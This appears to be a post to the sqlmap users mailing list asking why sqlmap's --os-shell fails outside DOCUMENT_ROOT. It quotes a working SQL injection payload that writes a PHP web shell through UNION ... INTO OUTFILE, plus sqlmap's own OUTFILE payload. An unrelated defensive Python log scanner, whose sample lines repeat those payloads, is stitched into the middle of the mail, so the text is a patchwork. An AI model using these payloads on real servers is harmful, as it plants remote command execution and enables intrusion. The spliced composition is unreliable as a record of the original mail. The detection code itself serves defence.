While using sqlmap with --os-shell I found that it only works if the
writable directory is directly in the DOCUMENT_ROOT;
if it is in another dir, sqlmap successfully uploads the PHP file
but couldn't connect through it.
Looks like it's because of the union garbage; if so, why does sqlmap send the
query like this:
-7440' OR 6498=6498 LIMIT 1 INTO OUTFILE instead of trying the union
statement?
Here's data I sent manually to the application
' UNION ALL SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL,NULL INTO
OUTFILE "/opt/lampp/htdocs/uploads/test.php"#
and here's sqlmap's payload:
-7440' OR 6498=6498 LIMIT 1 INTO OUTFILE 's/scope/sqli/tmpuywdg.php' LINES
TERMINATED BY
--
Also, LINES TERMINATED BY worked for me.
Thanks in advance
--
- Ahmed Shawky El-Antry
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member "http://www.isecur1ty.org"
- Twitter @lnxg33k
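From the defender's side, the two payload shapes quoted above (a UNION write and an OR/LIMIT 1 write, both ending in INTO OUTFILE with a script path) are easy to spot in the MySQL general query log. The following is an added example, not sqlmap code and not part of the original mail: it scans constructed log lines and tags file-write attempts, executable target paths, and PHP bodies.

```python
import re

# Constructed sample lines in a general-log-like layout (not real traffic).
# Line 2 mirrors the manual UNION payload from the mail, line 3 the sqlmap
# OR/LIMIT 1 shape (the truncated LINES TERMINATED BY clause is left out).
SAMPLE_LOG = """\
2012-04-25T10:00:01 5 Query SELECT id,name FROM items WHERE id='42'
2012-04-25T10:00:02 5 Query SELECT id,name FROM items WHERE id='' UNION ALL SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL,NULL INTO OUTFILE "/opt/lampp/htdocs/uploads/test.php"#'
2012-04-25T10:00:03 5 Query SELECT id,name FROM items WHERE id='-7440' OR 6498=6498 LIMIT 1 INTO OUTFILE 's/scope/sqli/tmpuywdg.php'
"""

# INTO OUTFILE / INTO DUMPFILE followed by a quoted path (group 3 is the path).
FILE_WRITE = re.compile(r"""\bINTO\s+(OUTFILE|DUMPFILE)\s+(['"])(.*?)\2""", re.I)
# Typical markers of a script body being written through the query.
SHELL_BODY = re.compile(r"<\?php|<\?=|\bsystem\s*\(|\bshell_exec\s*\(|\bpassthru\s*\(", re.I)
UNION_SELECT = re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)
EXEC_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")


def classify(line):
    """Return finding tags for one log line; an empty list means nothing suspicious."""
    findings = []
    write = FILE_WRITE.search(line)
    if write:
        findings.append("file_write")
        path = write.group(3)
        if path.lower().endswith(EXEC_EXT):
            findings.append("executable_target")
        if not path.startswith("/"):
            # Relative OUTFILE paths are resolved by the MySQL server, not the
            # web server, so the file may not land where the attacker expects.
            findings.append("relative_path")
    if SHELL_BODY.search(line):
        findings.append("web_shell_body")
    if write and UNION_SELECT.search(line):
        findings.append("union_write")
    return findings


def scan(log_text):
    """Return (line_number, findings) for every suspicious line in the log."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits
```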
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users